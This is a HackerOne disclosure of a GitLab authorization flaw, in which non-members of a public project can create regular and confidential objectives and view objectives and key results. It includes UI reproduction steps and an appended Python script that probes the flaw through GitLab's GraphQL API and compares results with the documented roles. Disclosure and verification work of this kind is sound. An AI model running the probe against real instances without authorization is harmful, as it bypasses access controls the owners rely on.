A user who is not a member of a project is capable of creating regular/confidential objectives inside the project contrary to documentation
HackerOne report #2223468 by ricardobrito
on 2023-10-24, assigned to @ngeorge1:
Report
Hi team,
Summary
I would like to report 4 issues here:

- According to the documentation, a user needs at least `guest` role in a project in order to be able to create objectives inside the project. However, I have found that a user who is not a member of a project (not even `guest` role) is capable of creating objectives inside the project.
- According to the documentation, you must have at least `reporter` role in order to create a confidential objective. However, I have found that a user who does not even have `guest` role (not part of the project) is capable of creating a confidential objective.
- According to the documentation, a user must have at least `guest` role for the project in order to be able to view an objective. However, I have found that a user who is not a member of a project (not even `guest` role) is capable of viewing objectives created by other users.
- According to the documentation, a user needs at least `guest` role inside a project in order to view an objective's key results. However, I have found that a user who is not a member of a project is capable of viewing key results.
Pre-Requisites
You need to enable the feature flag `okrs_mvc` for the instance in order to be able to access the objectives feature:

```ruby
Feature.enable(:okrs_mvc)
```
Steps to reproduce
- As user A, create a public project.
- As user B, go to the project's issues; in the top right corner (where it says "New issue"), press the arrow button and select "New objective".
- Fill in the text and click on "Create objective". The objective is created even though you do not even have `guest` role in the project.
- As user A, create an objective by following the above steps. Inside the objective you can also create a key result.
- As user B, go to the project issues and you will be able to view the objectives created by user A (and after you click on one you will also be able to view the key results added to it), even though the documentation says you need at least `guest` role.
- As user B, create another objective but mark it as confidential. The objective will be created and it will be confidential, contrary to the documentation, which states that you need at least `reporter` role in order to create confidential objectives.
The most impactful thing here is that a user who is not a member of the project should not be able to create objectives inside the project, but it is possible for this user to create confidential objectives as well.
I will let the [@]gitlab team determine the impact.
POC Video
objectives-permission-issues.mov
Impact
A user who is not a project member is capable of viewing objectives created by other users, and of creating regular and confidential objectives, contrary to the documentation.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section:
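The steps above are clicked through the UI. The script below is an added example (not part of the HackerOne report and not GitLab's own code) that drives the same three checks through GitLab's GraphQL API as user B and compares what the server allows with the minimum roles the report quotes from the documentation. It assumes the `workItemCreate` mutation, its `WorkItemCreateInput` fields (`projectPath`, `workItemTypeId`, `title`, `confidential`) and the `project.workItems(types: [OBJECTIVE])` listing exist under those names; the project path `group/public-project`, the environment variables and the Objective type id are placeholders. The access-level integers (10 = Guest, 20 = Reporter) are GitLab's real values. The `post` callable is injected so the verdict logic can be exercised offline with constructed responses.

```python
import json
import urllib.request

# GitLab access-level integers (real values from the GitLab API): 10 = Guest, 20 = Reporter.
GUEST, REPORTER = 10, 20

# Minimum role the report says the documentation requires; an actor role of None means "not a member".
DOCUMENTED_MIN_ROLE = {
    "create_objective": GUEST,
    "create_confidential_objective": REPORTER,
    "view_objectives": GUEST,
}


def work_item_create_mutation(project_path, objective_type_id, title, confidential):
    """GraphQL payload that creates an objective work item.

    Assumption: workItemCreate and the WorkItemCreateInput fields used here
    (projectPath, workItemTypeId, title, confidential) match GitLab's public schema.
    """
    query = """
    mutation($input: WorkItemCreateInput!) {
      workItemCreate(input: $input) {
        workItem { id iid confidential }
        errors
      }
    }"""
    variables = {"input": {"projectPath": project_path, "workItemTypeId": objective_type_id,
                           "title": title, "confidential": confidential}}
    return {"query": query, "variables": variables}


def list_objectives_query(project_path):
    """GraphQL payload listing objective work items of a project (assumed schema)."""
    query = """
    query($path: ID!) {
      project(fullPath: $path) {
        workItems(types: [OBJECTIVE]) { nodes { iid title confidential } }
      }
    }"""
    return {"query": query, "variables": {"path": project_path}}


def graphql_post(gitlab_url, token, payload):
    """Real transport: POST the payload to /api/graphql as the user owning `token`."""
    req = urllib.request.Request(
        gitlab_url.rstrip("/") + "/api/graphql",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json", "Authorization": f"Bearer {token}"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


def create_succeeded(response):
    """True when the mutation returned a work item and no errors (top-level or mutation-level)."""
    if response.get("errors"):
        return False
    result = (response.get("data") or {}).get("workItemCreate") or {}
    return bool(result.get("workItem")) and not result.get("errors")


def listing_exposed_objectives(response):
    """True when the project listing returned at least one objective to this user."""
    if response.get("errors"):
        return False
    project = (response.get("data") or {}).get("project") or {}
    nodes = ((project.get("workItems") or {}).get("nodes")) or []
    return len(nodes) > 0


def verdict(action, actor_role, succeeded):
    """Compare what the server allowed with the documented minimum role for `action`."""
    permitted_by_docs = actor_role is not None and actor_role >= DOCUMENTED_MIN_ROLE[action]
    if succeeded and not permitted_by_docs:
        return "FINDING"      # allowed although the documentation says it should be denied
    if not succeeded and permitted_by_docs:
        return "UNEXPECTED"   # denied although the documentation says it should be allowed
    return "OK"


def run_checks(post, project_path, objective_type_id, actor_role):
    """Run the three checks from the report through `post(payload) -> response dict`.

    `actor_role` is the access level user B actually holds in the project (None = not a member).
    """
    results = {}
    for action, confidential in (("create_objective", False),
                                 ("create_confidential_objective", True)):
        resp = post(work_item_create_mutation(project_path, objective_type_id,
                                              f"permission probe ({action})", confidential))
        results[action] = verdict(action, actor_role, create_succeeded(resp))
    resp = post(list_objectives_query(project_path))
    results["view_objectives"] = verdict("view_objectives", actor_role,
                                         listing_exposed_objectives(resp))
    return results


if __name__ == "__main__":
    # Live run against a test instance (placeholder names): user B's token, the public project
    # and the Objective type id taken from `project { workItemTypes { nodes { id name } } }`.
    import os

    def post(payload):
        return graphql_post(os.environ["GITLAB_URL"], os.environ["USER_B_TOKEN"], payload)

    print(run_checks(post, "group/public-project", os.environ["OBJECTIVE_TYPE_ID"], actor_role=None))
```

Run it with a token for a user who holds no membership in the target project (`actor_role=None`); every `FINDING` line corresponds to one of the report's bullets. Running it again with a token for a Guest member (`actor_role=GUEST`) should report `OK` for plain creation and viewing and `FINDING` only for the confidential case, which is the documented Reporter boundary.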